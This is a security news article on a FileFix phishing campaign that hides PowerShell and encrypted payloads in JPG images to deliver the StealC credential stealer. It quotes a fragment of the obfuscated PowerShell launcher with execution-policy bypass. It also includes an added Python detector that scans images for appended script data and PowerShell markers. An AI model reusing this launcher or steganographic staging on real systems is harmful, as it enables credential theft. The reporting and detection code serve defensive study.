New Innovative FileFix Attack in the Wild Leverages Steganography to Deliver StealC Malware

In Cybersecurity News. Original news source: cybersecuritynews.com, by Blog Writer.

A sophisticated cyberthreat campaign has emerged that represents a significant evolution in social engineering attacks, introducing the first real-world implementation of FileFix attack methodology beyond proof-of-concept demonstrations.

This advanced threat leverages steganography techniques to conceal malicious payloads within seemingly innocent JPG images, ultimately delivering the StealC information stealer to compromised systems.

The attack campaign represents a notable departure from traditional ClickFix methodologies, utilizing file upload functionality in HTML to trick victims into executing malicious PowerShell commands through Windows File Explorer address bars.

Unlike conventional approaches that rely on terminal access, this FileFix variant targets the more universally accessible file upload interface, potentially expanding the attack surface to users who may never have opened command-line interfaces.

A typical ClickFix attack may ask the victim to run malicious code for the attacker (Source – Acronis)

The threat actors behind this campaign have invested considerable resources in developing a multilingual phishing infrastructure that mimics Facebook security pages across 16 languages, including Arabic, Russian, Hindi, Japanese, Polish, German, Spanish, French, Malay, and Urdu.

The sophisticated social engineering pretext warns victims of imminent account suspension, urging them to access a purported incident report through a fabricated file path that serves as the attack vector.

The phishing site mimics the look of a Meta Help Support page (Source – Acronis)

Acronis researchers identified this campaign as the first sophisticated implementation of FileFix methodology that significantly deviates from the original proof-of-concept developed by researcher Mr. d0x in July 2025.

The attack demonstrates remarkable technical sophistication, incorporating multiple layers of obfuscation, anti-analysis mechanisms, and a complex multistage payload delivery system that sets new standards for evasion techniques in this category of threats.

The campaign’s global reach is evidenced by VirusTotal submissions from multiple countries including the United States, Bangladesh, Philippines, Tunisia, Nepal, Dominican Republic, Serbia, Peru, China, and Germany, suggesting a coordinated international targeting strategy designed to maximize victim exposure across diverse geographic regions.

The attack’s most innovative aspect lies in its sophisticated use of steganography to embed both second-stage PowerShell scripts and encrypted executable payloads within artificially generated landscape images featuring pastoral scenes.

These JPG files, hosted on legitimate platforms like BitBucket, contain malicious code at specific byte indices that are extracted and executed through a carefully orchestrated process.

The initial PowerShell payload employs extensive obfuscation techniques, fragmenting commands into variables and utilizing Base64 encoding to evade pattern-based detection systems.

The command structure demonstrates advanced evasion capabilities:

PowerShell -noP -W H -ep Bypass -C "$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;$e=[System.Text.Encoding]::UTF8..."

Once executed, the payload downloads the steganographic image to the victim’s temporary directory and extracts the embedded second-stage script from predetermined byte ranges within the file structure.

This secondary script implements RC4 decryption and gzip decompression functions to process the concealed executable payload, which ultimately deploys a Go-based loader equipped with virtual machine detection capabilities and string encryption mechanisms.
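As an added illustration (not from the Acronis report or the campaign's own tooling), a Python triage check for images of this kind: it walks the JPEG segment structure to find where the picture ends, flags any bytes appended after the EOI marker, and reports the byte offsets of known PowerShell strings such as the ReadAllBytes/WriteAllBytes calls quoted above. The minimal JPEG bytes and the appended stage-2 stub are constructed for the example.

```python
import re

# Strings a second-stage PowerShell stub is likely to carry (taken from the command quoted above).
SCRIPT_MARKERS = [b"powershell", b"FromBase64String", b"Invoke-Expression",
                  b"ReadAllBytes", b"WriteAllBytes", b"-ep Bypass"]

def jpeg_end_offset(data: bytes):
    """Walk the JPEG marker segments; return the offset just past EOI, or None if malformed.
    Bytes stored after EOI are ignored by image viewers, which makes them a convenient hiding place."""
    if data[:2] != b"\xff\xd8":                      # must start with SOI
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xFF:                           # fill byte, skip it
            pos += 1
        elif marker == 0xD9:                         # EOI reached
            return pos + 2
        elif marker == 0xDA:                         # SOS: entropy-coded data runs to EOI
            eoi = data.find(b"\xff\xd9", pos + 2)
            return None if eoi == -1 else eoi + 2
        elif 0xD0 <= marker <= 0xD7 or marker == 0x01:  # standalone markers carry no length field
            pos += 2
        else:                                        # length field counts itself, not the marker
            pos += 2 + int.from_bytes(data[pos + 2:pos + 4], "big")
    return None

def scan_image(data: bytes):
    """Return findings: trailing data after EOI plus any script markers and their byte offsets."""
    findings = []
    end = jpeg_end_offset(data)
    if end is None:
        findings.append("not a well-formed JPEG")
    elif end < len(data):
        findings.append(f"{len(data) - end} trailing bytes after EOI at offset {end}")
    for marker in SCRIPT_MARKERS:
        for m in re.finditer(re.escape(marker), data, re.IGNORECASE):
            findings.append(f"script marker {marker.decode()!r} at offset {m.start()}")
    return findings

# Constructed sample: a minimal JPEG (SOI, APP0, SOS, EOI) and a copy with a stage-2 stub appended after EOI.
BENIGN_JPEG = (b"\xff\xd8" + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00" + b"\x00" * 9
               + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x00" * 6 + b"\x12\x34\x56" + b"\xff\xd9")
STAGED_JPEG = BENIGN_JPEG + b"$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_JPEG), ("staged", STAGED_JPEG)):
        print(name, scan_image(blob) or ["clean"])
```

A payload hidden inside a legitimate segment (for example an APP or COM segment) will not trigger the trailing-data check, so the marker scan, which runs over the whole file, is the more general signal.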

The final payload delivers StealC malware, a comprehensive information stealer targeting browser credentials, cryptocurrency wallets, messaging applications, gaming platforms, VPN configurations, and cloud service credentials. Affected applications include Chrome, Firefox, Telegram, Discord, various cryptocurrency wallets, and AWS/Azure authentication keys, and the stealer establishes persistent access for ongoing data exfiltration operations.
